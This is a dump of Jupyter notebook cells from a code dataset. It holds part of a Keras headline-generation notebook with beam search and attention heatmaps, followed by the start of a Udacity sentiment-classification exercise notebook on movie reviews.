"_____no_output_____"
],
[
"model = Sequential()\nmodel.add(rnn_model)\n\nif activation_rnn_size:\n model.add(SimpleContext(name='simplecontext_1'))",
"_____no_output_____"
],
[
"# we are not going to fit so we dont care about loss and optimizer\nmodel.compile(loss='categorical_crossentropy', optimizer='adam')",
"_____no_output_____"
],
[
"n = 2*(rnn_size - activation_rnn_size)\nn",
"_____no_output_____"
]
],
[
[
"perform the top dense of the trained model in numpy so we can play around with exactly how it works",
"_____no_output_____"
]
],
[
[
"# out very own softmax\ndef output2probs(output):\n output = np.dot(output, weights[0]) + weights[1]\n output -= output.max()\n output = np.exp(output)\n output /= output.sum()\n return output",
"_____no_output_____"
],
[
"def output2probs1(output):\n output0 = np.dot(output[:n//2], weights[0][:n//2,:])\n output1 = np.dot(output[n//2:], weights[0][n//2:,:])\n output = output0 + output1 # + output0 * output1\n output += weights[1]\n output -= output.max()\n output = np.exp(output)\n output /= output.sum()\n return output",
"_____no_output_____"
]
],
[
[
"# Test",
"_____no_output_____"
]
],
[
[
"def lpadd(x, maxlend=maxlend, eos=eos):\n \"\"\"left (pre) pad a description to maxlend and then add eos.\n The eos is the input to predicting the first word in the headline\n \"\"\"\n assert maxlend >= 0\n if maxlend == 0:\n return [eos]\n n = len(x)\n if n > maxlend:\n x = x[-maxlend:]\n n = maxlend\n return [empty]*(maxlend-n) + x + [eos]",
"_____no_output_____"
],
[
"samples = [lpadd([3]*26)]\n# pad from right (post) so the first maxlend will be description followed by headline\ndata = sequence.pad_sequences(samples, maxlen=maxlen, value=empty, padding='post', truncating='post')",
"_____no_output_____"
],
[
"np.all(data[:,maxlend] == eos)",
"_____no_output_____"
],
[
"data.shape,map(len, samples)",
"_____no_output_____"
],
[
"probs = model.predict(data, verbose=0, batch_size=1)\nprobs.shape",
"_____no_output_____"
]
],
[
[
"# Sample generation",
"_____no_output_____"
]
],
[
[
"# variation to https://github.com/ryankiros/skip-thoughts/blob/master/decoding/search.py\ndef beamsearch(predict, start=[empty]*maxlend + [eos], avoid=None, avoid_score=1,\n k=1, maxsample=maxlen, use_unk=True, oov=vocab_size-1, empty=empty, eos=eos, temperature=1.0):\n \"\"\"return k samples (beams) and their NLL scores, each sample is a sequence of labels,\n all samples starts with an `empty` label and end with `eos` or truncated to length of `maxsample`.\n You need to supply `predict` which returns the label probability of each sample.\n `use_unk` allow usage of `oov` (out-of-vocabulary) label in samples\n \"\"\"\n def sample(energy, n, temperature=temperature):\n \"\"\"sample at most n different elements according to their energy\"\"\"\n n = min(n,len(energy))\n prb = np.exp(-np.array(energy) / temperature )\n res = []\n for i in xrange(n):\n z = np.sum(prb)\n r = np.argmax(np.random.multinomial(1, prb/z, 1))\n res.append(r)\n prb[r] = 0. # make sure we select each element only once\n return res\n\n dead_samples = []\n dead_scores = []\n live_samples = [list(start)]\n live_scores = [0]\n\n while live_samples:\n # for every possible live sample calc prob for every possible label \n probs = predict(live_samples, empty=empty)\n assert vocab_size == probs.shape[1]\n\n # total score for every sample is sum of -log of word prb\n cand_scores = np.array(live_scores)[:,None] - np.log(probs)\n cand_scores[:,empty] = 1e20\n if not use_unk and oov is not None:\n cand_scores[:,oov] = 1e20\n if avoid:\n for a in avoid:\n for i, s in enumerate(live_samples):\n n = len(s) - len(start)\n if n < len(a):\n # at this point live_sample is before the new word,\n # which should be avoided, is added\n cand_scores[i,a[n]] += avoid_score\n live_scores = list(cand_scores.flatten())\n \n\n # find the best (lowest) scores we have from all possible dead samples and\n # all live samples and all possible new words added\n scores = dead_scores + live_scores\n ranks = sample(scores, k)\n n = len(dead_scores)\n dead_scores = [dead_scores[r] for r in ranks if r < n]\n dead_samples = [dead_samples[r] for r in ranks if r < n]\n \n live_scores = [live_scores[r-n] for r in ranks if r >= n]\n live_samples = [live_samples[(r-n)//vocab_size]+[(r-n)%vocab_size] for r in ranks if r >= n]\n\n # live samples that should be dead are...\n # even if len(live_samples) == maxsample we dont want it dead because we want one\n # last prediction out of it to reach a headline of maxlenh\n def is_zombie(s):\n return s[-1] == eos or len(s) > maxsample\n \n # add zombies to the dead\n dead_scores += [c for s, c in zip(live_samples, live_scores) if is_zombie(s)]\n dead_samples += [s for s in live_samples if is_zombie(s)]\n \n # remove zombies from the living \n live_scores = [c for s, c in zip(live_samples, live_scores) if not is_zombie(s)]\n live_samples = [s for s in live_samples if not is_zombie(s)]\n\n return dead_samples, dead_scores",
"_____no_output_____"
],
[
"# !pip install python-Levenshtein",
"_____no_output_____"
],
[
"def keras_rnn_predict(samples, empty=empty, model=model, maxlen=maxlen):\n \"\"\"for every sample, calculate probability for every possible label\n you need to supply your RNN model and maxlen - the length of sequences it can handle\n \"\"\"\n sample_lengths = map(len, samples)\n assert all(l > maxlend for l in sample_lengths)\n assert all(l[maxlend] == eos for l in samples)\n # pad from right (post) so the first maxlend will be description followed by headline\n data = sequence.pad_sequences(samples, maxlen=maxlen, value=empty, padding='post', truncating='post')\n probs = model.predict(data, verbose=0, batch_size=batch_size)\n return np.array([output2probs(prob[sample_length-maxlend-1]) for prob, sample_length in zip(probs, sample_lengths)])",
"_____no_output_____"
],
[
"def vocab_fold(xs):\n \"\"\"convert list of word indexes that may contain words outside vocab_size to words inside.\n If a word is outside, try first to use glove_idx2idx to find a similar word inside.\n If none exist then replace all accurancies of the same unknown word with <0>, <1>, ...\n \"\"\"\n xs = [x if x < vocab_size-nb_unknown_words else glove_idx2idx.get(x,x) for x in xs]\n # the more popular word is <0> and so on\n outside = sorted([x for x in xs if x >= vocab_size-nb_unknown_words])\n # if there are more than nb_unknown_words oov words then put them all in nb_unknown_words-1\n outside = dict((x,vocab_size-1-min(i, nb_unknown_words-1)) for i, x in enumerate(outside))\n xs = [outside.get(x,x) for x in xs]\n return xs",
"_____no_output_____"
],
[
"def vocab_unfold(desc,xs):\n # assume desc is the unfolded version of the start of xs\n unfold = {}\n for i, unfold_idx in enumerate(desc):\n fold_idx = xs[i]\n if fold_idx >= vocab_size-nb_unknown_words:\n unfold[fold_idx] = unfold_idx\n return [unfold.get(x,x) for x in xs]",
"_____no_output_____"
],
[
"import sys\nimport Levenshtein\n\ndef gensamples(X=None, X_test=None, Y_test=None, avoid=None, avoid_score=1, skips=2, k=10, batch_size=batch_size, short=True, temperature=1., use_unk=True):\n if X is None or isinstance(X,int):\n if X is None:\n i = random.randint(0,len(X_test)-1)\n else:\n i = X\n print 'HEAD %d:'%i,' '.join(idx2word[w] for w in Y_test[i])\n print 'DESC:',' '.join(idx2word[w] for w in X_test[i])\n sys.stdout.flush()\n x = X_test[i]\n else:\n x = [word2idx[w.rstrip('^')] for w in X.split()]\n \n if avoid:\n # avoid is a list of avoids. Each avoid is a string or list of word indeicies\n if isinstance(avoid,str) or isinstance(avoid[0], int):\n avoid = [avoid]\n avoid = [a.split() if isinstance(a,str) else a for a in avoid]\n avoid = [vocab_fold([w if isinstance(w,int) else word2idx[w] for w in a])\n for a in avoid]\n\n print 'HEADS:'\n samples = []\n if maxlend == 0:\n skips = [0]\n else:\n skips = range(min(maxlend,len(x)), max(maxlend,len(x)), abs(maxlend - len(x)) // skips + 1)\n for s in skips:\n start = lpadd(x[:s])\n fold_start = vocab_fold(start)\n sample, score = beamsearch(predict=keras_rnn_predict, start=fold_start, avoid=avoid, avoid_score=avoid_score,\n k=k, temperature=temperature, use_unk=use_unk)\n assert all(s[maxlend] == eos for s in sample)\n samples += [(s,start,scr) for s,scr in zip(sample,score)]\n\n samples.sort(key=lambda x: x[-1])\n codes = []\n for sample, start, score in samples:\n code = ''\n words = []\n sample = vocab_unfold(start, sample)[len(start):]\n for w in sample:\n if w == eos:\n break\n words.append(idx2word[w])\n code += chr(w//(256*256)) + chr((w//256)%256) + chr(w%256)\n if short:\n distance = min([100] + [-Levenshtein.jaro(code,c) for c in codes])\n if distance > -0.6:\n print score, ' '.join(words)\n # print '%s (%.2f) %f'%(' '.join(words), score, distance)\n else:\n print score, ' '.join(words)\n codes.append(code)\n return samples",
"_____no_output_____"
],
[
"seed = 8\nrandom.seed(seed)\nnp.random.seed(seed)",
"_____no_output_____"
],
[
"X = \"* Billy Joel is looking for a buyer in Sagaponack^ . Now that he and wife Katie Lee Joel are splitting up , the singer is planning to sell the two oceanfront^ properties he bought for her in 2007 . The four-bedroom mansion ( No . 1 ) and smaller beach bungalow^ ( No . 2 ) will be listed with Corcoran 's Biana^ Stepanian^ for a combined $ 35 million . * Richard Bressler^ , the former CFO of Viacom and now a managing\"\nY = \"Billy Joel Lists in Sagaponack^\"",
"_____no_output_____"
],
[
"samples = gensamples(X=X, skips=2, batch_size=batch_size, k=10, temperature=1.)",
"_____no_output_____"
],
[
"X = \"18 Cake GIFs That 'll Make You Moist\"\nY = \"Is it 350degF^ in here or is it just me ?\"",
"_____no_output_____"
],
[
"samples = gensamples(X, skips=2, batch_size=batch_size, k=10, temperature=1.)",
"_____no_output_____"
],
[
"X = \"President Barack Obama 's re-election campaign is fundraising off of comments on Obama 's birth certificate by Mitt Romney 's son Matt .\"",
"_____no_output_____"
],
[
"gensamples(X, skips=2, batch_size=batch_size, k=10, temperature=1, use_unk=True, short=False);",
"_____no_output_____"
],
[
"X = \"What have you been listening to this year ? If you want to find out using cold , hard evidence , then Spotify 's new Year in Music tool will tell you .\"\nY = \"Spotify Will Make You Smarter for Your App\"",
"_____no_output_____"
],
[
"samples = gensamples(X, skips=2, batch_size=batch_size, k=10, temperature=1)",
"_____no_output_____"
],
[
"headline = samples[0][0][len(samples[0][1]):]",
"_____no_output_____"
],
[
"' '.join(idx2word[w] for w in headline)",
"_____no_output_____"
],
[
"avoid = headline",
"_____no_output_____"
],
[
"samples = gensamples(X, avoid=avoid, avoid_score=.1, skips=2, batch_size=batch_size, k=10, temperature=1.)",
"_____no_output_____"
],
[
"avoid = samples[0][0][len(samples[0][1]):]",
"_____no_output_____"
],
[
"samples = gensamples(X, avoid=avoid, avoid_score=.1, skips=2, batch_size=batch_size, k=10, temperature=1.)",
"_____no_output_____"
],
[
"len(samples)",
"_____no_output_____"
]
],
[
[
"# Weights",
"_____no_output_____"
]
],
[
[
"def wsimple_context(X, mask, n=activation_rnn_size, maxlend=maxlend, maxlenh=maxlenh):\n desc, head = X[:,:maxlend], X[:,maxlend:]\n head_activations, head_words = head[:,:,:n], head[:,:,n:]\n desc_activations, desc_words = desc[:,:,:n], desc[:,:,n:]\n \n # RTFM http://deeplearning.net/software/theano/library/tensor/basic.html#theano.tensor.batched_tensordot\n # activation for every head word and every desc word\n activation_energies = K.batch_dot(head_activations, desc_activations, axes=([2],[2]))\n # make sure we dont use description words that are masked out\n assert mask.ndim == 2\n activation_energies = K.switch(mask[:, None, :maxlend], activation_energies, -1e20)\n \n # for every head word compute weights for every desc word\n activation_energies = K.reshape(activation_energies,(-1,maxlend))\n activation_weights = K.softmax(activation_energies)\n activation_weights = K.reshape(activation_weights,(-1,maxlenh,maxlend))\n\n return activation_weights\n\n\nclass WSimpleContext(Lambda):\n def __init__(self):\n super(WSimpleContext, self).__init__(wsimple_context)\n self.supports_masking = True\n\n def compute_mask(self, input, input_mask=None):\n return input_mask[:, maxlend:]\n \n def get_output_shape_for(self, input_shape):\n nb_samples = input_shape[0]\n n = 2*(rnn_size - activation_rnn_size)\n return (nb_samples, maxlenh, n)",
"_____no_output_____"
],
[
"wmodel = Sequential()\nwmodel.add(rnn_model)",
"_____no_output_____"
],
[
"wmodel.add(WSimpleContext())",
"_____no_output_____"
],
[
"wmodel.compile(loss='categorical_crossentropy', optimizer=optimizer)",
"_____no_output_____"
]
],
[
[
"## test",
"_____no_output_____"
]
],
[
[
"seed = 8\nrandom.seed(seed)\nnp.random.seed(seed)",
"_____no_output_____"
],
[
"context_weight.set_value(np.float32(1.))\nhead_weight.set_value(np.float32(1.))",
"_____no_output_____"
],
[
"X = \"Representatives of the groups depicted in The Revenant^ spoke with BuzzFeed News about the actor 's Golden Globes speech calling on listeners to `` protect ... indigenous lands . ''\"\nY = \"Native American Groups Officially Respond To Leonardo DiCaprio 's Call To Action\"",
"_____no_output_____"
],
[
"samples = gensamples(X, skips=2, batch_size=batch_size, k=10, temperature=1.)",
"_____no_output_____"
],
[
"sample = samples[0][0]",
"_____no_output_____"
],
[
"' '.join([idx2word[w] for w in sample])",
"_____no_output_____"
],
[
"data = sequence.pad_sequences([sample], maxlen=maxlen, value=empty, padding='post', truncating='post')\ndata.shape",
"_____no_output_____"
],
[
"weights = wmodel.predict(data, verbose=0, batch_size=1)\nweights.shape",
"_____no_output_____"
],
[
"startd = np.where(data[0,:] != empty)[0][0]\nlenh = np.where(data[0,maxlend+1:] == eos)[0][0]\nstartd, lenh",
"_____no_output_____"
],
[
"import matplotlib.pyplot as plt\n%matplotlib inline\nplt.hist(np.array(weights[0,:lenh,startd:].flatten()+1), bins=100);",
"_____no_output_____"
],
[
"import numpy as np\nfrom IPython.core.display import display, HTML\n\ndef heat(sample,weights,dark=0.3):\n weights = (weights - weights.min())/(weights.max() - weights.min() + 1e-4)\n html = ''\n fmt = ' <span style=\"background-color: #{0:x}{0:x}ff\">{1}</span>'\n for t,w in zip(sample,weights):\n c = int(256*((1.-dark)*(1.-w)+dark))\n html += fmt.format(c,idx2word[t])\n display(HTML(html))",
"_____no_output_____"
],
[
"heat(sample, weights[0,-1])",
"_____no_output_____"
],
[
"import pandas as pd\nimport seaborn as sns",
"_____no_output_____"
],
[
"columns = [idx2word[data[0,i]] for i in range(startd,maxlend)]\nrows = [idx2word[data[0,i]] for i in range(maxlend+1,maxlend+lenh+1)]",
"_____no_output_____"
],
[
"df = pd.DataFrame(weights[0,:lenh,startd:],columns=columns,index=rows)",
"_____no_output_____"
],
[
"sns.heatmap(df);",
"_____no_output_____"
]
]
] | [
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
e708fe23da3cffe9b6f420e1eb3cf609855c6701 | 101,540 | ipynb | Jupyter Notebook | sentiment-network/Sentiment_Classification_Projects.ipynb | jaknap32/Udacity_DeepLearning_Nanodegree | 158beda367171cea289a27ae15b5b2f20b6dc9ca | [
"MIT"
] | 1 | 2017-12-20T15:27:52.000Z | 2017-12-20T15:27:52.000Z | sentiment-network/Sentiment_Classification_Projects.ipynb | jaknap32/udacity_DeepLearning_Nanodegree | 158beda367171cea289a27ae15b5b2f20b6dc9ca | [
"MIT"
] | null | null | null | sentiment-network/Sentiment_Classification_Projects.ipynb | jaknap32/udacity_DeepLearning_Nanodegree | 158beda367171cea289a27ae15b5b2f20b6dc9ca | [
"MIT"
] | null | null | null | 52.448347 | 38,682 | 0.724562 | [
[
[
"# Sentiment Classification & How To \"Frame Problems\" for a Neural Network\n\nby Andrew Trask\n\n- **Twitter**: @iamtrask\n- **Blog**: http://iamtrask.github.io",
"_____no_output_____"
],
[
"### What You Should Already Know\n\n- neural networks, forward and back-propagation\n- stochastic gradient descent\n- mean squared error\n- and train/test splits\n\n### Where to Get Help if You Need it\n- Re-watch previous Udacity Lectures\n- Leverage the recommended Course Reading Material - [Grokking Deep Learning](https://www.manning.com/books/grokking-deep-learning) (Check inside your classroom for a discount code)\n- Shoot me a tweet @iamtrask\n\n\n### Tutorial Outline:\n\n- Intro: The Importance of \"Framing a Problem\" (this lesson)\n\n- [Curate a Dataset](#lesson_1)\n- [Developing a \"Predictive Theory\"](#lesson_2)\n- [**PROJECT 1**: Quick Theory Validation](#project_1)\n\n\n- [Transforming Text to Numbers](#lesson_3)\n- [**PROJECT 2**: Creating the Input/Output Data](#project_2)\n\n\n- Putting it all together in a Neural Network (video only - nothing in notebook)\n- [**PROJECT 3**: Building our Neural Network](#project_3)\n\n\n- [Understanding Neural Noise](#lesson_4)\n- [**PROJECT 4**: Making Learning Faster by Reducing Noise](#project_4)\n\n\n- [Analyzing Inefficiencies in our Network](#lesson_5)\n- [**PROJECT 5**: Making our Network Train and Run Faster](#project_5)\n\n\n- [Further Noise Reduction](#lesson_6)\n- [**PROJECT 6**: Reducing Noise by Strategically Reducing the Vocabulary](#project_6)\n\n\n- [Analysis: What's going on in the weights?](#lesson_7)",
"_____no_output_____"
],
[
"# Lesson: Curate a Dataset<a id='lesson_1'></a>\nThe cells from here until Project 1 include code Andrew shows in the videos leading up to mini project 1. We've included them so you can run the code along with the videos without having to type in everything.",
"_____no_output_____"
]
],
[
[
"def pretty_print_review_and_label(i):\n print(labels[i] + \"\\t:\\t\" + reviews[i][:80] + \"...\")\n\ng = open('reviews.txt','r') # What we know!\nreviews = list(map(lambda x:x[:-1],g.readlines()))\ng.close()\n\ng = open('labels.txt','r') # What we WANT to know!\nlabels = list(map(lambda x:x[:-1].upper(),g.readlines()))\ng.close()",
"_____no_output_____"
]
],
[
[
"**Note:** The data in `reviews.txt` we're using has already been preprocessed a bit and contains only lower case characters. If we were working from raw data, where we didn't know it was all lower case, we would want to add a step here to convert it. That's so we treat different variations of the same word, like `The`, `the`, and `THE`, all the same way.",
"_____no_output_____"
]
],
[
[
"len(reviews)",
"_____no_output_____"
],
[
"reviews[0]",
"_____no_output_____"
],
[
"labels[0]",
"_____no_output_____"
]
],
[
[
"# Lesson: Develop a Predictive Theory<a id='lesson_2'></a>",
"_____no_output_____"
]
],
[
[
"print(\"labels.txt \\t : \\t reviews.txt\\n\")\npretty_print_review_and_label(2137)\npretty_print_review_and_label(12816)\npretty_print_review_and_label(6267)\npretty_print_review_and_label(21934)\npretty_print_review_and_label(5297)\npretty_print_review_and_label(4998)",
"labels.txt \t : \t reviews.txt\n\nNEGATIVE\t:\tthis movie is terrible but it has some good effects . ...\nPOSITIVE\t:\tadrian pasdar is excellent is this film . he makes a fascinating woman . ...\nNEGATIVE\t:\tcomment this movie is impossible . is terrible very improbable bad interpretat...\nPOSITIVE\t:\texcellent episode movie ala pulp fiction . days suicides . it doesnt get more...\nNEGATIVE\t:\tif you haven t seen this it s terrible . it is pure trash . i saw this about ...\nPOSITIVE\t:\tthis schiffer guy is a real genius the movie is of excellent quality and both e...\n"
]
],
[
[
"# Project 1: Quick Theory Validation<a id='project_1'></a>\n\nThere are multiple ways to implement these projects, but in order to get your code closer to what Andrew shows in his solutions, we've provided some hints and starter code throughout this notebook.\n\nYou'll find the [Counter](https://docs.python.org/2/library/collections.html#collections.Counter) class to be useful in this exercise, as well as the [numpy](https://docs.scipy.org/doc/numpy/reference/) library.",
"_____no_output_____"
]
],
[
[
"from collections import Counter\nimport numpy as np",
"_____no_output_____"
]
],
[
[
"We'll create three `Counter` objects, one for words from postive reviews, one for words from negative reviews, and one for all the words.",
"_____no_output_____"
]
],
[
[
"# Create three Counter objects to store positive, negative and total counts\npositive_counts = Counter()\nnegative_counts = Counter()\ntotal_counts = Counter()",
"_____no_output_____"
]
],
[
[
"**TODO:** Examine all the reviews. For each word in a positive review, increase the count for that word in both your positive counter and the total words counter; likewise, for each word in a negative review, increase the count for that word in both your negative counter and the total words counter.\n\n**Note:** Throughout these projects, you should use `split(' ')` to divide a piece of text (such as a review) into individual words. If you use `split()` instead, you'll get slightly different results than what the videos and solutions show.",
"_____no_output_____"
]
],
[
[
"# TODO: Loop over all the words in all the reviews and increment the counts in the appropriate counter objects",
"_____no_output_____"
]
],
[
[
"Run the following two cells to list the words used in positive reviews and negative reviews, respectively, ordered from most to least commonly used. ",
"_____no_output_____"
]
],
[
[
"# Examine the counts of the most common words in positive reviews\npositive_counts.most_common()",
"_____no_output_____"
],
[
"# Examine the counts of the most common words in negative reviews\nnegative_counts.most_common()",
"_____no_output_____"
]
],
[
[
"As you can see, common words like \"the\" appear very often in both positive and negative reviews. Instead of finding the most common words in positive or negative reviews, what you really want are the words found in positive reviews more often than in negative reviews, and vice versa. To accomplish this, you'll need to calculate the **ratios** of word usage between positive and negative reviews.\n\n**TODO:** Check all the words you've seen and calculate the ratio of postive to negative uses and store that ratio in `pos_neg_ratios`. \n>Hint: the positive-to-negative ratio for a given word can be calculated with `positive_counts[word] / float(negative_counts[word]+1)`. Notice the `+1` in the denominator – that ensures we don't divide by zero for words that are only seen in positive reviews.",
"_____no_output_____"
]
],
[
[
"# Create Counter object to store positive/negative ratios\npos_neg_ratios = Counter()\n\n# TODO: Calculate the ratios of positive and negative uses of the most common words\n# Consider words to be \"common\" if they've been used at least 100 times",
"_____no_output_____"
]
],
[
[
"Examine the ratios you've calculated for a few words:",
"_____no_output_____"
]
],
[
[
"print(\"Pos-to-neg ratio for 'the' = {}\".format(pos_neg_ratios[\"the\"]))\nprint(\"Pos-to-neg ratio for 'amazing' = {}\".format(pos_neg_ratios[\"amazing\"]))\nprint(\"Pos-to-neg ratio for 'terrible' = {}\".format(pos_neg_ratios[\"terrible\"]))",
"_____no_output_____"
]
],
[
[
"Looking closely at the values you just calculated, we see the following:\n\n* Words that you would expect to see more often in positive reviews – like \"amazing\" – have a ratio greater than 1. The more skewed a word is toward postive, the farther from 1 its positive-to-negative ratio will be.\n* Words that you would expect to see more often in negative reviews – like \"terrible\" – have positive values that are less than 1. The more skewed a word is toward negative, the closer to zero its positive-to-negative ratio will be.\n* Neutral words, which don't really convey any sentiment because you would expect to see them in all sorts of reviews – like \"the\" – have values very close to 1. A perfectly neutral word – one that was used in exactly the same number of positive reviews as negative reviews – would be almost exactly 1. The `+1` we suggested you add to the denominator slightly biases words toward negative, but it won't matter because it will be a tiny bias and later we'll be ignoring words that are too close to neutral anyway.\n\nOk, the ratios tell us which words are used more often in postive or negative reviews, but the specific values we've calculated are a bit difficult to work with. A very positive word like \"amazing\" has a value above 4, whereas a very negative word like \"terrible\" has a value around 0.18. Those values aren't easy to compare for a couple of reasons:\n\n* Right now, 1 is considered neutral, but the absolute value of the postive-to-negative rations of very postive words is larger than the absolute value of the ratios for the very negative words. So there is no way to directly compare two numbers and see if one word conveys the same magnitude of positive sentiment as another word conveys negative sentiment. So we should center all the values around netural so the absolute value fro neutral of the postive-to-negative ratio for a word would indicate how much sentiment (positive or negative) that word conveys.\n* When comparing absolute values it's easier to do that around zero than one. \n\nTo fix these issues, we'll convert all of our ratios to new values using logarithms.\n\n**TODO:** Go through all the ratios you calculated and convert them to logarithms. (i.e. use `np.log(ratio)`)\n\nIn the end, extremely positive and extremely negative words will have positive-to-negative ratios with similar magnitudes but opposite signs.",
"_____no_output_____"
]
],
[
[
"# TODO: Convert ratios to logs",
"_____no_output_____"
]
],
[
[
"Examine the new ratios you've calculated for the same words from before:",
"_____no_output_____"
]
],
[
[
"print(\"Pos-to-neg ratio for 'the' = {}\".format(pos_neg_ratios[\"the\"]))\nprint(\"Pos-to-neg ratio for 'amazing' = {}\".format(pos_neg_ratios[\"amazing\"]))\nprint(\"Pos-to-neg ratio for 'terrible' = {}\".format(pos_neg_ratios[\"terrible\"]))",
"_____no_output_____"
]
],
[
[
"If everything worked, now you should see neutral words with values close to zero. In this case, \"the\" is near zero but slightly positive, so it was probably used in more positive reviews than negative reviews. But look at \"amazing\"'s ratio - it's above `1`, showing it is clearly a word with positive sentiment. And \"terrible\" has a similar score, but in the opposite direction, so it's below `-1`. It's now clear that both of these words are associated with specific, opposing sentiments.\n\nNow run the following cells to see more ratios. \n\nThe first cell displays all the words, ordered by how associated they are with postive reviews. (Your notebook will most likely truncate the output so you won't actually see *all* the words in the list.)\n\nThe second cell displays the 30 words most associated with negative reviews by reversing the order of the first list and then looking at the first 30 words. (If you want the second cell to display all the words, ordered by how associated they are with negative reviews, you could just write `reversed(pos_neg_ratios.most_common())`.)\n\nYou should continue to see values similar to the earlier ones we checked – neutral words will be close to `0`, words will get more positive as their ratios approach and go above `1`, and words will get more negative as their ratios approach and go below `-1`. That's why we decided to use the logs instead of the raw ratios.",
"_____no_output_____"
]
],
[
[
"# words most frequently seen in a review with a \"POSITIVE\" label\npos_neg_ratios.most_common()",
"_____no_output_____"
],
[
"# words most frequently seen in a review with a \"NEGATIVE\" label\nlist(reversed(pos_neg_ratios.most_common()))[0:30]\n\n# Note: Above is the code Andrew uses in his solution video, \n# so we've included it here to avoid confusion.\n# If you explore the documentation for the Counter class, \n# you will see you could also find the 30 least common\n# words like this: pos_neg_ratios.most_common()[:-31:-1]",
"_____no_output_____"
]
],
[
[
"# End of Project 1. \n## Watch the next video to see Andrew's solution, then continue on to the next lesson.\n\n# Transforming Text into Numbers<a id='lesson_3'></a>\nThe cells here include code Andrew shows in the next video. We've included it so you can run the code along with the video without having to type in everything.",
"_____no_output_____"
]
],
[
[
"from IPython.display import Image\n\nreview = \"This was a horrible, terrible movie.\"\n\nImage(filename='sentiment_network.png')",
"_____no_output_____"
],
[
"review = \"The movie was excellent\"\n\nImage(filename='sentiment_network_pos.png')",
"_____no_output_____"
]
],
[
[
"# Project 2: Creating the Input/Output Data<a id='project_2'></a>\n\n**TODO:** Create a [set](https://docs.python.org/3/tutorial/datastructures.html#sets) named `vocab` that contains every word in the vocabulary.",
"_____no_output_____"
]
],
[
[
"# TODO: Create set named \"vocab\" containing all of the words from all of the reviews\nvocab = None",
"_____no_output_____"
]
],
[
[
"Run the following cell to check your vocabulary size. If everything worked correctly, it should print **74074**",
"_____no_output_____"
]
],
[
[
"vocab_size = len(vocab)\nprint(vocab_size)",
"_____no_output_____"
]
],
[
[
"Take a look at the following image. It represents the layers of the neural network you'll be building throughout this notebook. `layer_0` is the input layer, `layer_1` is a hidden layer, and `layer_2` is the output layer.",
"_____no_output_____"
]
],
[
[
"from IPython.display import Image\nImage(filename='sentiment_network_2.png')",
"_____no_output_____"
]
],
[
[
"**TODO:** Create a numpy array called `layer_0` and initialize it to all zeros. You will find the [zeros](https://docs.scipy.org/doc/numpy/reference/generated/numpy.zeros.html) function particularly helpful here. Be sure you create `layer_0` as a 2-dimensional matrix with 1 row and `vocab_size` columns. ",
"_____no_output_____"
]
],
[
[
"# TODO: Create layer_0 matrix with dimensions 1 by vocab_size, initially filled with zeros\nlayer_0 = None",
"_____no_output_____"
]
],
[
[
"Run the following cell. It should display `(1, 74074)`",
"_____no_output_____"
]
],
[
[
"layer_0.shape",
"_____no_output_____"
],
[
"from IPython.display import Image\nImage(filename='sentiment_network.png')",
"_____no_output_____"
]
],
[
[
"`layer_0` contains one entry for every word in the vocabulary, as shown in the above image. We need to make sure we know the index of each word, so run the following cell to create a lookup table that stores the index of every word.",
"_____no_output_____"
]
],
[
[
"# Create a dictionary of words in the vocabulary mapped to index positions\n# (to be used in layer_0)\nword2index = {}\nfor i,word in enumerate(vocab):\n word2index[word] = i\n \n# display the map of words to indices\nword2index",
"_____no_output_____"
]
],
[
[
"**TODO:** Complete the implementation of `update_input_layer`. It should count \n how many times each word is used in the given review, and then store\n those counts at the appropriate indices inside `layer_0`.",
"_____no_output_____"
]
],
[
[
"def update_input_layer(review):\n \"\"\" Modify the global layer_0 to represent the vector form of review.\n The element at a given index of layer_0 should represent\n how many times the given word occurs in the review.\n Args:\n review(string) - the string of the review\n Returns:\n None\n \"\"\"\n global layer_0\n # clear out previous state by resetting the layer to be all 0s\n layer_0 *= 0\n \n # TODO: count how many times each word is used in the given review and store the results in layer_0 ",
"_____no_output_____"
]
],
[
[
"Run the following cell to test updating the input layer with the first review. The indices assigned may not be the same as in the solution, but hopefully you'll see some non-zero values in `layer_0`. ",
"_____no_output_____"
]
],
[
[
"update_input_layer(reviews[0])\nlayer_0",
"_____no_output_____"
]
],
[
[
"**TODO:** Complete the implementation of `get_target_for_labels`. It should return `0` or `1`, \n depending on whether the given label is `NEGATIVE` or `POSITIVE`, respectively.",
"_____no_output_____"
]
],
[
[
"def get_target_for_label(label):\n \"\"\"Convert a label to `0` or `1`.\n Args:\n label(string) - Either \"POSITIVE\" or \"NEGATIVE\".\n Returns:\n `0` or `1`.\n \"\"\"\n # TODO: Your code here",
"_____no_output_____"
]
],
[
[
"Run the following two cells. They should print out`'POSITIVE'` and `1`, respectively.",
"_____no_output_____"
]
],
[
[
"labels[0]",
"_____no_output_____"
],
[
"get_target_for_label(labels[0])",
"_____no_output_____"
]
],
[
[
"Run the following two cells. They should print out `'NEGATIVE'` and `0`, respectively.",
"_____no_output_____"
]
],
[
[
"labels[1]",
"_____no_output_____"
],
[
"get_target_for_label(labels[1])",
"_____no_output_____"
]
],
[
[
"# End of Project 2. \n## Watch the next video to see Andrew's solution, then continue on to the next lesson.",
"_____no_output_____"
],
[
"# Project 3: Building a Neural Network<a id='project_3'></a>",
"_____no_output_____"
],
[
